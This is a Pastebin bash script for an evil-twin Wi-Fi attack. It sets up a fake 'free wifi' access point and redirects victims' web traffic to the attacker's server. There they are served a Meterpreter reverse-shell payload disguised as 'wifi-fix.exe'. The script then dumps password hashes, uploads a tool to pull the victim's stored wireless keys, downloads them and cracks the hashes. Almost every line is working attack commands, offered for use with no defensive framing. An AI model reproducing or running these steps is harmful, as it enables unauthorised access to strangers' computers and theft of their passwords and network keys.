Advertisement
Guest User

g0tmi1k

a guest
Jun 26th, 2009
1,270
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.67 KB | None | 0 0
  1. #Non Transparent - Target cant get on the internet
  2. #Fake AP: wlan1
  3. #Targets IP Address: 10.0.0.20
  4.  
  5. #**************************************************** Setup Fake AP ********
  6. modprobe tun
  7. airbase-ng -P -C 30 -e "free wifi" wlan1 -v
  8.  
  9. #******************************************* Non Transparent Airbase ********
  10. ifconfig at0 up
  11. ifconfig lo up
  12. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  13. ifconfig at0 mtu 1400
  14. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  15. iptables --flush
  16. iptables --table nat --flush
  17. iptables --delete-chain
  18. iptables --table nat --delete-chain
  19. iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
  20. iptables -P FORWARD ACCEPT
  21. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  22.  
  23. #************************************************ Setup DHCP Server ********
  24. dhcpd3 -d -f -cf /etc/dhcpd.conf at0
  25.  
  26. #************************************** Force them to go to our site ********
  27. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  28. # cd /pentest/misc/dnspentest
  29. # java ServerKernelMain 10.0.0.1 10.0.0.1
  30.  
  31. #************************************************** Start Web Server ********
  32. sh -c "start-apache"
  33.  
  34. #**************************************************** Get exploit ready ********
  35. cd /pentest/exploits/framework3
  36. #./msfconsole
  37. #use exploit/multi/handler
  38. #set PAYLOAD windows/meterpreter/reverse_tcp
  39. #set LHOST 10.0.0.1
  40. #set LPORT 55555
  41. #show options
  42. #exploit
  43. ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/wifi-fix.exe
  44. ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 E
  45.  
  46. #*************************************** Check that Target connected ********
  47. arp -n -v -i at0
  48. ping 10.0.0.20
  49.  
  50. #***************************************************** Metasploit fun ********
  51. session -l
  52. sysinfo
  53. getuid
  54. use priv
  55. hashdump
  56. session -i 1
  57.  
  58. #***************************************************** Steal wifi info ********
  59. mkdir c://g0tmi1k
  60. mkdir c://g0tmi1k//wkviewer
  61. cd C:/g0tmi1k/wkviewer4
  62. upload /root/tools/wkviewer/wkv.exe c://g0tmi1k//wkviewer4
  63. upload /root/tools/wkviewer/wkv32.exe c://g0tmi1k//wkviewer4
  64. #upload /root/tools/wkviewer/wkv64.exe c://g0tmi1k//wkviewer4
  65. #upload /root/tools/wkviewer/wkv.bat c://g0tmi1k//wkviewer4
  66. #upload /root/tools/wkviewer/metsvc-server.exe c://g0tmi1k//wkviewer4
  67. #upload /root/tools/wkviewer/metsrv.dll c://g0tmi1k//wkviewer4
  68. #upload /root/tools/wkviewer/metsvc.exe c://g0tmi1k//wkviewer4
  69. execute -H -f wkv.bat
  70. cat wkv.txt
  71. download wkv.txt /root/wkv.txt
  72.  
  73. #***************************************************** Crack Hashes ********
  74. exit
  75. cd /pentest/passwords/jtr/
  76. ./john /root/HASH.txt
  77. rm -r /root/HASH.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement